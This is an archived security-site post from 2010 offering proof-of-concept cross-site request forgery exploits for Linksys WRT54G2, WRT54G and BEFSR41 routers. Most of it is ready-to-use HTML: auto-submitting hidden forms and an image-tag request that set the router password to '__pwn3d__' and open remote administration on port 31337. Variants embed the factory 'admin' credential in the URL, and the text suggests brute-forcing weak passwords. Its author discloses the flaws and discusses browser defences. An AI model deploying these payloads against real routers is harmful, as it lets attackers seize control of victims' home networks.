what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Linksys Router Cross Site Request Forgery

Linksys Router Cross Site Request Forgery
Posted Dec 3, 2010
Authored by Martin Barbella

Proof of concept exploits for cross site request forgery vulnerabilities found in the Linksys WRT54G2 and WRT54G routers.

tags | exploit, vulnerability, proof of concept, csrf
SHA-256 | b828c25f846a2d0368ccab279f0ecc63d70d06cad75e64a301b44245aa6d868b

Linksys Router Cross Site Request Forgery

Change Mirror Download
It seems to be fairly well known that there are multiple unpatched
CSRF vulnerabilities in the administration interfaces for various
Linksys routers. Since the initial reports of these are from a few
years ago, and since some exploits are available, I have written
additional proof of concept exploits for the Linksys routers that I
have access to.



While in most cases the victim must be authenticated with the
application in question to exploit a CSRF vulnerability, since the
factory default passwords for all of the routers in question are known
to be admin, the victim does not necessarily need to be authenticated.
This means that only suggested workaround that I have seen up until
now, do not surf the web wile authenticated in the router's
administration interface, does not solve the problem in certain cases
where the user is still using the default password. This is mitigated
somewhat by the fact that most browsers provide at least some degree
of protection from these types of attacks, described in additional
detail below.



In each case, the proof of concept will enable remote administration
of the router on port 31337, while changing the password to __pwn3d__.



WRT54G2 PoC (tested with hardware version 1.5 and firmware version 1.50):



<html>

<head>

<title>WRT54G2 CSRF PoC</title>

</head>

<body onload="document.getElementById('F').submit()">

<form action="https://192.168.1.1/Manage.tri" method="post" id="F">

<input type="hidden" name="MANAGE_USE_HTTP" value="0" />

<input type="hidden" name="MANAGE_HTTP" value="1" />

<input type="hidden" name="MANAGE_HTTP_S" value="0" />

<input type="hidden" name="MANAGE_PASSWORDMOD" value="1" />

<input type="hidden" name="MANAGE_PASSWORD" value="__pwn3d__" />

<input type="hidden" name="MANAGE_PASSWORD_CONFIRM" value="__pwn3d__" />

<input type="hidden" name="_http_enable" value="1" />

<input type="hidden" name="MANAGE_WLFILTER" value="1" />

<input type="hidden" name="MANAGE_REMOTE" value="1" />

<input type="hidden" name="MANAGE_PORT" value="31337" />

<input type="hidden" name="MANAGE_UPNP" value="1" />

<input type="hidden" name="layout" value="en" />

</form>

</body>

</html>



The form's action can be changed in the following way to attempt to
log in with the default password:



<form action="https://a:admin@192.168.1.1/Manage.tri" method="post" id="F">



As I mentioned before, success of this type of exploit depends on the
victim's browser. This is simply blocked in IE8, while Safari will
give a phishing warning, Firefox warns the user that they are
attempting to log in with the name "a", and Google Chrome simply
allows the request without notifying the user in any way.



WRT54G PoC (tested with hardware version 6 and firmware version 1.02.8):



<html>

<head>

<title>WRT54G CSRF PoC</title>

</head>

<body onload="document.getElementById('F').submit()">

<form action="https://192.168.1.1/manage.tri" method="post" id="F">

<input type="hidden" name="remote_mgt_https" value="0" />

<input type="hidden" name="http_enable" value="1" />

<input type="hidden" name="https_enable" value="0" />

<input type="hidden" name="PasswdModify" value="1" />

<input type="hidden" name="http_passwd" value="__pwn3d__" />

<input type="hidden" name="http_passwdConfirm" value="__pwn3d__" />

<input type="hidden" name="_http_enable" value="1" />

<input type="hidden" name="web_wl_filter" value="1" />

<input type="hidden" name="remote_management" value="1" />

<input type="hidden" name="http_wanport" value="31337" />

<input type="hidden" name="upnp_enable" value="1" />

<input type="hidden" name="layout" value="en" />

</form>

</body>

</html>



To attempt a login with the default password, the same type of
modification can be made, as shown here:



<form action="https://a:admin@192.168.1.1/manage.tri" method="post" id="F">



BEFSR41 PoC (tested with hardware version 3 and firmware version 1.06.01):



<img src="https://192.168.1.1/Gozila.cgi?PasswdModify=1&sysPasswd=__pwn3d__&sysPasswdConfirm=__pwn3d__&Remote_Upgrade=1&Remote_Management=1&RemotePort=31337&UPnP_Work=0"
alt="Nothing to see here." />



And once again, a modification can be made to attempt to log in with
the default password, as shown here:



<img src="https://a:admin@192.168.1.1/Gozila.cgi?PasswdModify=1&sysPasswd=__pwn3d__&sysPasswdConfirm=__pwn3d__&Remote_Upgrade=1&Remote_Management=1&RemotePort=31337&UPnP_Work=0"
alt="Nothing to see here." />



It is worth mentioning that even if a user has changed the router's
password, but is using a weak password, they may still be vulnerable
to this type of attack. An attacker could simply try many weak
passwords in a dictionary-style attack. They could also use javascript
to attempt to brute force the password, provided that they were able
to get the victim to stay on a page for a reasonably long time.



-Martin Barbella

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close